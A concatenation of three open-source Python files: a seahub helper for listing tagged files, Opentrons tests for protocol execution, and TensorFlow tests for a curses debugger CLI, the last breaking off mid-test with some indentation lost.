from seahub.file_tags.models import FileTags
# Get an instance of a logger
logger = logging.getLogger(__name__)
def get_files_tags_in_dir(repo_id, path):
    """Return {filename: [tag dict, ...]} for files tagged under a directory.

    Each tag dict carries the FileTags row pk plus the related repo tag's
    pk, name and color. select_related avoids one query per row for the
    repo_tag / file_uuid foreign keys.
    """
    dir_file_tags = FileTags.objects.get_dir_file_tags(
        repo_id, path).select_related('repo_tag', 'file_uuid')

    tags_by_filename = defaultdict(list)
    for tag in dir_file_tags:
        tags_by_filename[tag.file_uuid.filename].append({
            'file_tag_id': tag.pk,
            'repo_tag_id': tag.repo_tag.pk,
            'tag_name': tag.repo_tag.name,
            'tag_color': tag.repo_tag.color,
        })
    return tags_by_filename
def get_tagged_files(repo, repo_tag_id):
    """Collect metadata for every file carrying the given repo tag.

    Args:
        repo: repo object; ``repo.store_id`` is used for dirent lookups and
            ``repo.id`` only for log messages.
        repo_tag_id: primary key of the repo tag to filter FileTags rows by.

    Returns:
        A dict with the single key ``"tagged_files"`` mapping to a list of
        per-file dicts. Files whose dirent can no longer be resolved are
        reported with ``file_deleted=True`` (name and tag id only) instead
        of being silently dropped, so callers can surface stale tags.
    """
    tagged_file_objs = FileTags.objects.filter(
        repo_tag__id=repo_tag_id).select_related('repo_tag', 'file_uuid')
    tagged_files = defaultdict(list)

    for tagged_file_obj in tagged_file_objs:
        file_tag_id = tagged_file_obj.pk
        parent_path = tagged_file_obj.file_uuid.parent_path
        filename = tagged_file_obj.file_uuid.filename
        file_path = posixpath.join(parent_path, filename)

        file_obj = seafile_api.get_dirent_by_path(repo.store_id, file_path)
        if not file_obj:
            # Tag row exists but the file is gone. Use lazy %-style logging
            # args instead of pre-formatting the message string.
            logger.warning("Can't find tagged file. Repo_id: %s, Path: %s.",
                           repo.id, file_path)
            tagged_files["tagged_files"].append({
                "file_deleted": True,
                "file_tag_id": file_tag_id,
                "filename": filename,
            })
            continue

        modifier = file_obj.modifier
        tagged_files["tagged_files"].append({
            "file_tag_id": file_tag_id,
            "parent_path": parent_path,
            "filename": filename,
            "size": file_obj.size,
            "mtime": file_obj.mtime,
            "last_modified": timestamp_to_isoformat_timestr(file_obj.mtime),
            "modifier_email": modifier,
            "modifier_contact_email": email2contact_email(modifier),
            "modifier_name": email2nickname(modifier),
        })
    return tagged_files
| miurahr/seahub | seahub/utils/file_tags.py | Python | apache-2.0 | 2,647 |
import pytest
from opentrons.protocol_api import ProtocolContext
from opentrons.protocols.execution import execute, execute_python
from opentrons.protocols.parse import parse
def test_api2_runfunc():
    """_runfunc_ok only accepts run() signatures bindable with one argument."""

    def no_params():
        pass

    def two_required_params(a, b):
        pass

    # Zero required parameters, or more than one, are both rejected.
    for bad_func in (no_params, two_required_params):
        with pytest.raises(SyntaxError):
            execute_python._runfunc_ok(bad_func)

    def second_param_defaulted(a, b=2):
        pass

    def single_defaulted_param(a=2):
        pass

    def var_positional(*args):
        pass

    # Each of these can be called with exactly one positional argument,
    # so none of them may raise.
    for ok_func in (second_param_defaulted, single_defaulted_param,
                    var_positional):
        execute_python._runfunc_ok(ok_func)
@pytest.mark.parametrize('protocol_file', ['testosaur_v2.py'])
def test_execute_ok(protocol, protocol_file, loop):
    """A known-good APIv2 protocol parses and runs to completion without error."""
    proto = parse(protocol.text, protocol.filename)
    ctx = ProtocolContext(loop)
    # Success criterion is simply that no exception propagates.
    execute.run_protocol(proto, context=ctx)
def test_bad_protocol(loop):
    """Malformed run() signatures raise MalformedProtocolError with a hint."""
    ctx = ProtocolContext(loop)

    zero_arg_proto = parse('''
metadata={"apiLevel": "2.0"}
def run():
    pass
''')
    with pytest.raises(execute_python.MalformedProtocolError) as excinfo:
        execute.run_protocol(zero_arg_proto, context=ctx)
    assert "Function 'run()' does not take any parameters" in str(excinfo.value)

    two_arg_proto = parse('''
metadata={"apiLevel": "2.0"}
def run(a, b):
    pass
''')
    with pytest.raises(execute_python.MalformedProtocolError) as excinfo:
        execute.run_protocol(two_arg_proto, context=ctx)
    assert "must be called with more than one argument" in str(excinfo.value)
def test_proto_with_exception(loop):
    """Exceptions raised by protocol code become ExceptionInProtocolError,
    with the raising line's protocol line number in the message."""
    ctx = ProtocolContext(loop)
    exc_in_root = '''metadata={"apiLevel": "2.0"}
def run(ctx):
    raise Exception("hi")
'''
    protocol = parse(exc_in_root)
    with pytest.raises(execute_python.ExceptionInProtocolError) as e:
        execute.run_protocol(
            protocol,
            context=ctx)
    # NOTE(review): reported line numbers are one past the raise's position
    # in the literal above (3 -> 4, and 4 -> 5 below) -- presumably parse()
    # prepends a line to the protocol source; confirm before relying on it.
    assert 'Exception [line 4]: hi' in str(e.value)

    # Same check when the raise happens inside a helper called from run().
    nested_exc = '''
import ast

def this_throws():
    raise Exception("hi")

def run(ctx):
    this_throws()

metadata={"apiLevel": "2.0"};
'''
    protocol = parse(nested_exc)
    with pytest.raises(execute_python.ExceptionInProtocolError) as e:
        execute.run_protocol(
            protocol,
            context=ctx)
    assert '[line 5]' in str(e.value)
    assert 'Exception [line 5]: hi' in str(e.value)
| Opentrons/labware | api/tests/opentrons/protocols/execution/test_execute_python.py | Python | apache-2.0 | 2,472 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests of the curses-based CLI."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import curses
import numpy as np
from tensorflow.python.debug.cli import curses_ui
from tensorflow.python.debug.cli import debugger_cli_common
from tensorflow.python.debug.cli import tensor_format
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
def string_to_codes(cmd):
  """Convert a command string into the list of key codes curses would see."""
  return list(map(ord, cmd))
def codes_to_string(cmd_code):
  """Convert key codes back to a string, dropping non-ASCII codes (>= 256)."""
  return "".join(chr(code) for code in cmd_code if code < 256)
class MockCursesUI(curses_ui.CursesUI):
  """Mock subclass of CursesUI that bypasses actual terminal manipulations.

  Simulated keystrokes come from `command_sequence` (a list of key-code
  lists, one per command); screen-side effects are captured in observer
  lists that tests assert against.
  """

  def __init__(self, height, width, command_sequence=None):
    # Pretend-terminal dimensions, reported via _screen_refresh_size().
    self._height = height
    self._width = width

    self._command_sequence = command_sequence
    # Index of the next command in _command_sequence to feed to the UI.
    self._command_counter = 0

    # The mock class has no actual textbox. So use this variable to keep
    # track of what's entered in the textbox on creation.
    self._curr_existing_command = ""

    # Observers for test.
    # Observers of screen output.
    self.unwrapped_outputs = []
    self.wrapped_outputs = []
    self.scroll_messages = []
    self.output_array_pointer_indices = []
    self.output_pad_rows = []

    # Observers of command textbox.
    self.existing_commands = []

    # Observer for tab-completion candidates.
    self.candidates_lists = []

    # Observer for toast messages.
    self.toasts = []

    curses_ui.CursesUI.__init__(self)

  # Below, override the _screen_ prefixed member methods that interact with the
  # actual terminal, so that the mock can run in a terminal-less environment.
  # TODO(cais): Search for a way to have a mock terminal object that behaves
  # like the actual terminal, so that we can test the terminal interaction
  # parts of the CursesUI class.
  def _screen_init(self):
    pass

  def _screen_refresh_size(self):
    # Report the mock dimensions instead of querying a real terminal.
    self._max_y = self._height
    self._max_x = self._width

  def _screen_launch(self):
    pass

  def _screen_terminate(self):
    pass

  def _screen_refresh(self):
    pass

  def _screen_create_command_window(self):
    pass

  def _screen_create_command_textbox(self, existing_command):
    """Override to insert observer of existing commands.

    Used in testing of history navigation and tab completion.

    Args:
      existing_command: Command string entered to the textbox at textbox
        creation time. Note that the textbox does not actually exist in this
        mock subclass. This method only keeps track of and records the state.
    """
    self.existing_commands.append(existing_command)
    self._curr_existing_command = existing_command

  def _screen_new_output_pad(self, rows, cols):
    # A placeholder stands in for the curses pad object.
    return "mock_pad"

  def _screen_add_line_to_output_pad(self, pad, row, txt, color_segments=None):
    pass

  def _screen_draw_text_line(self, row, line, attr=curses.A_NORMAL, color=None):
    pass

  def _screen_scroll_output_pad(self, pad, viewport_top, viewport_left,
                                screen_location_top, screen_location_left,
                                screen_location_bottom, screen_location_right):
    pass

  def _screen_get_user_command(self):
    # Feed the next scripted command, one key code at a time.
    command = self._command_sequence[self._command_counter]

    self._command_key_counter = 0
    for c in command:
      if c == curses.KEY_RESIZE:
        # Special case for simulating a terminal resize event in curses.
        # The two codes following KEY_RESIZE are the new height and width.
        self._height = command[1]
        self._width = command[2]
        self._on_textbox_keypress(c)
        self._command_counter += 1
        return ""
      y = self._on_textbox_keypress(c)

      self._command_key_counter += 1
      if y == curses_ui.CursesUI.CLI_TERMINATOR_KEY:
        break

    self._command_counter += 1

    # Take into account pre-existing string automatically entered on textbox
    # creation.
    return self._curr_existing_command + codes_to_string(command)

  def _screen_gather_textbox_str(self):
    # Reconstruct the text typed so far for the current command.
    return codes_to_string(self._command_sequence[self._command_counter]
                           [:self._command_key_counter])

  def _scroll_output(self, direction, line_index=None):
    """Override to observe screen output.

    This method is invoked after every command that generates a new screen
    output and after every keyboard triggered screen scrolling. Therefore
    it is a good place to insert the observer.

    Args:
      direction: which direction to scroll.
      line_index: (int or None) Optional line index to scroll to. See doc string
        of the overridden method for more information.
    """
    curses_ui.CursesUI._scroll_output(self, direction, line_index=line_index)

    self.unwrapped_outputs.append(self._curr_unwrapped_output)
    self.wrapped_outputs.append(self._curr_wrapped_output)
    self.scroll_messages.append(self._scroll_info)
    self.output_array_pointer_indices.append(self._output_array_pointer_indices)
    self.output_pad_rows.append(self._output_pad_row)

  def _display_candidates(self, candidates):
    # Record tab-completion candidates in addition to the base behavior.
    curses_ui.CursesUI._display_candidates(self, candidates)

    self.candidates_lists.append(candidates)

  def _toast(self, message, color=None, line_index=None):
    # Record toast messages in addition to the base behavior.
    curses_ui.CursesUI._toast(self, message, color=color, line_index=line_index)

    self.toasts.append(message)
class CursesTest(test_util.TensorFlowTestCase):
_EXIT = string_to_codes("exit\n")
def _babble(self, args, screen_info=None):
  """Test command handler: emit `num_times` copies of `line`.

  Args:
    args: Command argument list, e.g. ["-n", "20", "-l", "foo"].
    screen_info: Unused; accepted to satisfy the handler interface.

  Returns:
    A RichTextLines holding the repeated line.
  """
  ap = argparse.ArgumentParser(
      description="Do babble.", usage=argparse.SUPPRESS)
  ap.add_argument(
      "-n",
      "--num_times",
      dest="num_times",
      type=int,
      default=60,
      help="How many times to babble")
  ap.add_argument(
      "-l",
      "--line",
      dest="line",
      type=str,
      default="bar",
      help="The content of each line")

  parsed = ap.parse_args(args)

  return debugger_cli_common.RichTextLines([parsed.line] * parsed.num_times)
def _print_ones(self, args, screen_info=None):
  """Test command handler: render an all-ones square matrix.

  Args:
    args: Command argument list, e.g. ["-s", "4"] for a 4x4 matrix.
    screen_info: Unused; accepted to satisfy the handler interface.

  Returns:
    RichTextLines produced by tensor_format for the matrix named "m".
  """
  ap = argparse.ArgumentParser(
      description="Print all-one matrix.", usage=argparse.SUPPRESS)
  ap.add_argument(
      "-s",
      "--size",
      dest="size",
      type=int,
      default=3,
      help="Size of the matrix. For example, of the value is 3, "
      "the matrix will have shape (3, 3)")

  parsed = ap.parse_args(args)

  m = np.ones([parsed.size, parsed.size])

  return tensor_format.format_tensor(m, "m")
def testInitialization(self):
  """A fresh UI starts with empty history and no pending command."""
  ui = MockCursesUI(40, 80)

  self.assertEqual(0, ui._command_pointer)
  self.assertEqual([], ui._active_command_history)
  self.assertEqual("", ui._pending_command)
def testRunUIExitImmediately(self):
  """Make sure that the UI can exit properly after launch."""
  ui = MockCursesUI(40, 80, command_sequence=[self._EXIT])
  ui.run_ui()

  # No screen output should have happened.
  self.assertEqual(0, len(ui.unwrapped_outputs))
def testRunUIEmptyCommand(self):
  """Issue an empty command then exit."""
  ui = MockCursesUI(40, 80, command_sequence=[[], self._EXIT])
  ui.run_ui()

  # Empty command should not lead to any screen output.
  self.assertEqual(0, len(ui.unwrapped_outputs))
def testRunUIInvalidCommandPrefix(self):
  """Handle an unregistered command prefix."""
  ui = MockCursesUI(
      40,
      80,
      command_sequence=[string_to_codes("foo\n"), self._EXIT])
  ui.run_ui()

  # Screen output/scrolling should have happened exactly once.
  self.assertEqual(1, len(ui.unwrapped_outputs))
  self.assertEqual(1, len(ui.wrapped_outputs))
  self.assertEqual(1, len(ui.scroll_messages))

  self.assertEqual(["ERROR: Invalid command prefix \"foo\""],
                   ui.unwrapped_outputs[0].lines)
  # TODO(cais): Add explanation for the 35 extra lines.
  self.assertEqual(["ERROR: Invalid command prefix \"foo\""],
                   ui.wrapped_outputs[0].lines[:1])
  # A single line of output should not have caused scrolling.
  self.assertEqual("-" * 80, ui.scroll_messages[0])
def testRunUIInvalidCommandSyntax(self):
  """Handle a command with invalid syntax."""
  ui = MockCursesUI(
      40,
      80,
      command_sequence=[string_to_codes("babble -z\n"), self._EXIT])

  ui.register_command_handler("babble", self._babble, "")
  ui.run_ui()

  # Screen output/scrolling should have happened exactly once.
  self.assertEqual(1, len(ui.unwrapped_outputs))
  self.assertEqual(1, len(ui.wrapped_outputs))
  self.assertEqual(1, len(ui.scroll_messages))
  # The -z flag is not defined by _babble's parser, so the UI should show
  # a syntax error plus a pointer at the command's help.
  self.assertEqual(
      ["Syntax error for command: babble", "For help, do \"help babble\""],
      ui.unwrapped_outputs[0].lines)
def testRunUIScrollTallOutputPageDownUp(self):
  """Scroll tall output with PageDown and PageUp."""

  # Use PageDown and PageUp to scroll back and forth a little before exiting.
  ui = MockCursesUI(
      40,
      80,
      command_sequence=[string_to_codes("babble\n"), [curses.KEY_NPAGE] * 2 +
                        [curses.KEY_PPAGE] + self._EXIT])

  ui.register_command_handler("babble", self._babble, "")
  ui.run_ui()

  # One initial screen output plus three scroll events should be recorded.
  self.assertEqual(4, len(ui.unwrapped_outputs))
  self.assertEqual(4, len(ui.wrapped_outputs))
  self.assertEqual(4, len(ui.scroll_messages))

  # Before scrolling.
  self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
  self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])

  # Initial scroll: At the top.
  self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])

  # After 1st scrolling (PageDown).
  # The screen output shouldn't have changed. Only the viewport should.
  self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
  self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
  self.assertIn("Scroll (PgDn/PgUp): 1.69%", ui.scroll_messages[1])

  # After 2nd scrolling (PageDown).
  self.assertIn("Scroll (PgDn/PgUp): 3.39%", ui.scroll_messages[2])

  # After 3rd scrolling (PageUp).
  self.assertIn("Scroll (PgDn/PgUp): 1.69%", ui.scroll_messages[3])
def testCutOffTooManyOutputLines(self):
  """Output beyond max_output_lines is truncated with a notice line."""
  ui = MockCursesUI(
      40,
      80,
      command_sequence=[string_to_codes("babble -n 20\n"), self._EXIT])

  # Modify max_output_lines so that this test doesn't use too much time or
  # memory.
  ui.max_output_lines = 10

  ui.register_command_handler("babble", self._babble, "")
  ui.run_ui()

  self.assertEqual(["bar"] * 10 + ["Output cut off at 10 lines!"],
                   ui.wrapped_outputs[0].lines[:11])
def testRunUIScrollTallOutputEndHome(self):
  """Scroll tall output with the End and Home keys."""

  # Use End and Home to scroll a little before exiting to test scrolling.
  ui = MockCursesUI(
      40,
      80,
      command_sequence=[
          string_to_codes("babble\n"),
          [curses.KEY_END] * 2 + [curses.KEY_HOME] + self._EXIT
      ])

  ui.register_command_handler("babble", self._babble, "")
  ui.run_ui()

  # One initial screen output plus three scroll events should be recorded.
  self.assertEqual(4, len(ui.unwrapped_outputs))
  self.assertEqual(4, len(ui.wrapped_outputs))
  self.assertEqual(4, len(ui.scroll_messages))

  # Before scrolling.
  self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
  self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])

  # Initial scroll: At the top.
  self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])

  # After 1st scrolling (End).
  self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[1])

  # After 2nd scrolling (End).
  self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[2])

  # After 3rd scrolling (Home).
  self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[3])
def testRunUIWithInitCmd(self):
  """Run UI with an initial command specified."""
  ui = MockCursesUI(40, 80, command_sequence=[self._EXIT])

  ui.register_command_handler("babble", self._babble, "")
  # init_command runs before any scripted keystrokes are consumed.
  ui.run_ui(init_command="babble")

  self.assertEqual(1, len(ui.unwrapped_outputs))

  self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
  self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
  self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
def testCompileHelpWithoutHelpIntro(self):
  """The help command lists a handler with its aliases and help text."""
  ui = MockCursesUI(
      40,
      80,
      command_sequence=[string_to_codes("help\n"), self._EXIT])

  ui.register_command_handler(
      "babble", self._babble, "babble some", prefix_aliases=["b"])
  ui.run_ui()

  self.assertEqual(["babble", "  Aliases: b", "", "  babble some"],
                   ui.unwrapped_outputs[0].lines[:4])
def testCompileHelpWithHelpIntro(self):
  """A configured help intro is prepended to the help command's output."""
  ui = MockCursesUI(
      40,
      80,
      command_sequence=[string_to_codes("help\n"), self._EXIT])

  help_intro = ["This is a curses UI.", "All it can do is 'babble'.", ""]
  ui.register_command_handler(
      "babble", self._babble, "babble some", prefix_aliases=["b"])
  ui.set_help_intro(help_intro)
  ui.run_ui()

  self.assertEqual(1, len(ui.unwrapped_outputs))
  self.assertEqual(
      help_intro + ["babble", "  Aliases: b", "", "  babble some"],
      ui.unwrapped_outputs[0].lines[:7])
  def testCommandHistoryNavBackwardOnce(self):
    """Up-arrow should recall the most recent command from history."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("help\n"),
                          [curses.KEY_UP],  # Hit Up and Enter.
                          string_to_codes("\n"),
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    self.assertEqual(2, len(ui.unwrapped_outputs))
    # Both outputs came from the same recalled "help" command.
    for i in [0, 1]:
      self.assertEqual(["babble", " Aliases: b", "", " babble some"],
                       ui.unwrapped_outputs[i].lines[:4])
  def testCommandHistoryNavBackwardTwice(self):
    """Two Up-arrows should recall the second-most-recent command."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("help\n"),
                          string_to_codes("babble\n"),
                          [curses.KEY_UP],
                          [curses.KEY_UP],  # Hit Up twice and Enter.
                          string_to_codes("\n"),
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    self.assertEqual(3, len(ui.unwrapped_outputs))
    # The 1st and 3rd outputs are for command "help".
    for i in [0, 2]:
      self.assertEqual(["babble", " Aliases: b", "", " babble some"],
                       ui.unwrapped_outputs[i].lines[:4])
    # The 2nd output is for command "babble".
    self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
  def testCommandHistoryNavBackwardOverLimit(self):
    """Up-arrow presses beyond the start of history should be no-ops."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("help\n"),
                          string_to_codes("babble\n"),
                          [curses.KEY_UP],
                          [curses.KEY_UP],
                          [curses.KEY_UP],  # Hit Up three times and Enter.
                          string_to_codes("\n"),
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    # Only two commands are in history, so the third Up stays on "help".
    self.assertEqual(3, len(ui.unwrapped_outputs))
    # The 1st and 3rd outputs are for command "help".
    for i in [0, 2]:
      self.assertEqual(["babble", " Aliases: b", "", " babble some"],
                       ui.unwrapped_outputs[i].lines[:4])
    # The 2nd output is for command "babble".
    self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
  def testCommandHistoryNavBackwardThenForward(self):
    """Down-arrow after Up-arrows should move forward in history again."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("help\n"),
                          string_to_codes("babble\n"),
                          [curses.KEY_UP],
                          [curses.KEY_UP],
                          [curses.KEY_DOWN],  # Hit Up twice and Down once.
                          string_to_codes("\n"),
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    self.assertEqual(3, len(ui.unwrapped_outputs))
    # The 1st output is for command "help".
    self.assertEqual(["babble", " Aliases: b", "", " babble some"],
                     ui.unwrapped_outputs[0].lines[:4])
    # The 2nd and 3rd outputs are for command "babble".
    for i in [1, 2]:
      self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[i].lines)
  def testCommandHistoryPrefixNavBackwardOnce(self):
    """Up-arrow with a typed prefix recalls the last matching command."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 1\n"),
            string_to_codes("babble -n 10\n"),
            string_to_codes("help\n"),
            string_to_codes("b") + [curses.KEY_UP],  # Navigate with prefix.
            string_to_codes("\n"),
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    self.assertEqual(["bar"], ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[1].lines)
    self.assertEqual(["babble", " Aliases: b", "", " babble some"],
                     ui.unwrapped_outputs[2].lines[:4])
    # "b" + Up recalled "babble -n 10", the most recent command that
    # starts with "b" (skipping "help").
    self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[3].lines)
  def testTerminalResize(self):
    """A terminal resize event should trigger a redraw of the output."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("babble\n"),
                          [curses.KEY_RESIZE, 100, 85],  # Resize to [100, 85]
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    # The resize event should have caused a second screen output event.
    self.assertEqual(2, len(ui.unwrapped_outputs))
    self.assertEqual(2, len(ui.wrapped_outputs))
    self.assertEqual(2, len(ui.scroll_messages))

    # The 1st and 2nd screen outputs should be identical (unwrapped).
    self.assertEqual(ui.unwrapped_outputs[0], ui.unwrapped_outputs[1])

    # The 1st scroll info should contain scrolling, because the screen size
    # is less than the number of lines in the output.
    self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
  def testTabCompletionWithCommonPrefix(self):
    """Tab completion should key in the common prefix of all candidates."""
    # Type "b" and trigger tab completion.
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("b\t"), string_to_codes("\n"),
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["ba"])
    ui.run_ui()

    # The automatically registered exit commands "exit" and "quit" should not
    # appear in the tab completion candidates because they don't start with
    # "b".
    self.assertEqual([["ba", "babble"]], ui.candidates_lists)

    # "ba" is a common prefix of the two candidates. So the "ba" command should
    # have been issued after the Enter.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(1, len(ui.wrapped_outputs))
    self.assertEqual(1, len(ui.scroll_messages))
    self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
  def testTabCompletionEmptyTriggerWithoutCommonPrefix(self):
    """Tab on an empty line lists all commands but keys nothing in."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("\t"),  # Trigger tab completion.
                          string_to_codes("\n"),
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["a"])
    # Use a different alias "a" instead.
    ui.run_ui()

    # The manually registered command, along with the automatically registered
    # exit commands should appear in the candidates.
    self.assertEqual([["a", "babble", "exit", "h", "help", "quit"]],
                     ui.candidates_lists)

    # The two candidates have no common prefix. So no command should have been
    # issued.
    self.assertEqual(0, len(ui.unwrapped_outputs))
    self.assertEqual(0, len(ui.wrapped_outputs))
    self.assertEqual(0, len(ui.scroll_messages))
  def testTabCompletionNonemptyTriggerSingleCandidate(self):
    """A single tab-completion match is keyed in without being displayed."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("b\t"),  # Trigger tab completion.
                          string_to_codes("\n"),
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["a"])
    ui.run_ui()

    # There is only one candidate, so no candidates should have been displayed.
    # Instead, the completion should have been automatically keyed in, leading
    # to the "babble" command being issued.
    self.assertEqual([[]], ui.candidates_lists)
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(1, len(ui.wrapped_outputs))
    self.assertEqual(1, len(ui.scroll_messages))
    self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
  def testTabCompletionNoMatch(self):
    """Tab with no matching candidate leaves the typed prefix unchanged."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[string_to_codes("c\t"),  # Trigger tab completion.
                          string_to_codes("\n"),
                          self._EXIT])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["a"])
    ui.run_ui()

    # Only the invalid command "c" should have been issued.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(1, len(ui.wrapped_outputs))
    self.assertEqual(1, len(ui.scroll_messages))

    self.assertEqual(["ERROR: Invalid command prefix \"c\""],
                     ui.unwrapped_outputs[0].lines)
    self.assertEqual(["ERROR: Invalid command prefix \"c\""],
                     ui.wrapped_outputs[0].lines[:1])
  def testTabCompletionOneWordContext(self):
    """Tab completion inside a command's argument uses the registered context."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 3\t"),  # Trigger tab completion.
            string_to_codes("\n"),
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.register_tab_comp_context(["babble", "b"], ["10", "20", "30", "300"])
    ui.run_ui()

    # Only the context items starting with "3" are candidates.
    self.assertEqual([["30", "300"]], ui.candidates_lists)

    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(1, len(ui.wrapped_outputs))
    self.assertEqual(1, len(ui.scroll_messages))
    self.assertEqual(["bar"] * 30, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 30, ui.wrapped_outputs[0].lines[:30])
  def testTabCompletionTwice(self):
    """Successive tabs should narrow the candidate list as the prefix grows."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 1\t"),  # Trigger tab completion.
            string_to_codes("2\t"),  # With more prefix, tab again.
            string_to_codes("3\n"),
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.register_tab_comp_context(["babble", "b"], ["10", "120", "123"])
    ui.run_ui()

    # There should have been two different lists of candidates.
    self.assertEqual([["10", "120", "123"], ["120", "123"]],
                     ui.candidates_lists)

    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(1, len(ui.wrapped_outputs))
    self.assertEqual(1, len(ui.scroll_messages))
    self.assertEqual(["bar"] * 123, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 123, ui.wrapped_outputs[0].lines[:123])
def testRegexSearch(self):
"""Test regex search."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("/a\n"), # Regex search and highlight.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The unwrapped (original) output should never have any highlighting.
self.assertEqual(3, len(ui.unwrapped_outputs))
for i in range(3):
self.assertEqual(["bar"] * 3, ui.unwrapped_outputs[i].lines)
self.assertEqual({}, ui.unwrapped_outputs[i].font_attr_segs)
# The wrapped outputs should show highlighting depending on the regex.
self.assertEqual(3, len(ui.wrapped_outputs))
# The first output should have no highlighting.
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
# The second output should have highlighting for "b" and "r".
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
ui.wrapped_outputs[1].font_attr_segs[i])
# The third output should have highlighting for "a" only.
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(1, 2, "black_on_white")],
ui.wrapped_outputs[2].font_attr_segs[i])
  def testRegexSearchContinuation(self):
    """Test continuing scrolling down to next regex match."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 3\n"),
            string_to_codes("/(b|r)\n"),  # Regex search and highlight.
            string_to_codes("/\n"),  # Continue scrolling down: 1st time.
            string_to_codes("/\n"),  # Continue scrolling down: 2nd time.
            string_to_codes("/\n"),  # Continue scrolling down: 3rd time.
            string_to_codes("/\n"),  # Continue scrolling down: 4th time.
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    # The 1st output is for the non-searched output. The other three are for
    # the searched output. Even though continuation search "/" is performed
    # four times, there should be only three searched outputs, because the
    # last one has exceeded the end.
